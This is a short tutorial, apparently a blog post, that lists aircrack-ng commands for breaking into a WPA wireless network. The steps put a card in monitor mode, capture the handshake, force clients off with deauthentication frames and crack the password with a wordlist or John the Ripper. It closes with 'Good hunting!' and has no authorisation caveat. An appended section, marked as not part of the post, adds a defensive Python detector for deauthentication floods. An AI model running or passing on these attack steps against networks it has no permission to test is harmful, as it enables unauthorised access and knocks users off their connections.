The following is a quick-hit list of commands for attacking a WPA wireless network. It assumes you are using a 2016 variant of Kali Linux with the aircrack-ng suite installed and a wireless network card that can be placed into monitor mode (which should be about 100% of them). It also assumes that there is a WPA network with an associated client that is transmitting, and that you are running as a user with sufficient permissions to execute each of these commands.
For the sake of this tutorial the AP will be assumed to have a MAC address of “99:88:77:66:55:44” and the client will be assumed to have a MAC address of “00:11:22:33:44:55”. The wireless network card we will use will be assumed to be “wlan0”.
If a presentation is more your style of learning you can access training on this topic here: Wireless Attacks – WPA & WPS (basic_0x01)
First up, boot up Kali and shut down any potentially interfering programs:
airmon-ng check kill
Then put the interface into monitor mode:
airmon-ng start wlan0
Next up, find the target WPA network:
airodump-ng wlan0mon
Make sure to note the client (00:11:22:33:44:55 for our example), the AP (99:88:77:66:55:44 for our example), and the channel (1 for our example), then exit airodump-ng with CTRL+C. Now restart airodump-ng to capture the handshake for the network:
airodump-ng --channel 1 --bssid 99:88:77:66:55:44 -w wpa-capture wlan0mon
Leave that running, then jump over to a new window/terminal and de-authenticate the client to generate a handshake to capture.
aireplay-ng -0 5 -a 99:88:77:66:55:44 -c 00:11:22:33:44:55 wlan0mon
To break that down a bit:
-0 5 means deauthentication attack (pretend to be the AP and tell the client to disconnect), and to do this 5 times
-a means the AP address
-c means the client address
Look at your airodump-ng window and confirm that you have “WPA handshake: 99:88:77:66:55:44” in the top right corner now, then close that process using CTRL+C. Now open up aircrack to crack the password (note that unlike WEP, you have to use a wordlist for WPA). Two possibilities:
aircrack-ng -e {ESSID} -w {WORDLIST} wpa-capture
… or …
john -stdout:{length} -incremental | aircrack-ng -e {ESSID} -w - wpa-capture
The first option uses a wordlist file (in Kali, try decompressing /usr/share/wordlists/rockyou.txt.gz and using that), while the second uses John the Ripper to brute-force every possible password up to {length} characters.
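The defender's view of the deauthentication step above, as an added example that is not part of the original post: a small Python detector that flags the burst of spoofed deauthentication frames that aireplay-ng -0 puts on the air, which is the signature a wireless IDS alerts on. The frames and timestamps are constructed inline using the post's AP and client addresses; the code assumes raw 802.11 frames with no radiotap header in front of them.

```python
import struct
from collections import defaultdict

AP, CLIENT = "99:88:77:66:55:44", "00:11:22:33:44:55"   # addresses from the post

def mac_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))
def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_deauth(raw):
    """Return (dst, src, bssid, reason) for an 802.11 deauth frame, else None.
    Frame Control byte 0 = version(2 bits) | type(2) | subtype(4), LSB first;
    deauth is management type 0 / subtype 12, i.e. 0xC0. Header layout:
    FC(2) duration(2) addr1(6) addr2(6) addr3(6) seqctl(2), then reason(2)."""
    if len(raw) < 26 or ((raw[0] >> 2) & 0x3, (raw[0] >> 4) & 0xF) != (0, 12):
        return None
    reason = struct.unpack_from("<H", raw, 24)[0]
    return mac_str(raw[4:10]), mac_str(raw[10:16]), mac_str(raw[16:22]), reason

def detect_deauth_flood(records, threshold=3, window=2.0):
    """records: iterable of (timestamp_seconds, raw_frame). Returns [(src, dst, burst)]
    for each claimed-source/target pair with >= threshold deauths inside any
    `window`-second span; burst is the largest such count. One deauth never alerts."""
    seen = defaultdict(list)
    for ts, raw in records:
        hit = parse_deauth(raw)
        if hit is not None:
            seen[(hit[1], hit[0])].append(ts)          # key: (claimed src, target)
    alerts = []
    for (src, dst), times in seen.items():
        times.sort()
        lo, best = 0, 0
        for hi, t in enumerate(times):
            while t - times[lo] > window:               # slide the window's left edge
                lo += 1
            best = max(best, hi - lo + 1)
        if best >= threshold:
            alerts.append((src, dst, best))
    return alerts

def build_deauth(dst, src, bssid, reason=7):
    """Constructed sample frame; reason 7 = class 3 frame from non-associated STA."""
    hdr = struct.pack("<BBH", 0xC0, 0x00, 0x013A) + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid)
    return hdr + b"\x00\x00" + struct.pack("<H", reason)

# Constructed capture: five spoofed deauths 100 ms apart (the on-air footprint of
# "aireplay-ng -0 5"), one unrelated FC 0x00 frame, and one lone deauth 30 s later.
SAMPLE_CAPTURE = [(0.1 * i, build_deauth(CLIENT, AP, AP)) for i in range(5)]
SAMPLE_CAPTURE += [(0.25, bytes(30)), (30.0, build_deauth(CLIENT, AP, AP))]
```

On a real capture the same logic runs over frames read from a monitor-mode interface or a pcap; a single deauth is normal roaming or shutdown behaviour, so only the repeated burst is worth an alert.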
That’s all there is to it… Good hunting!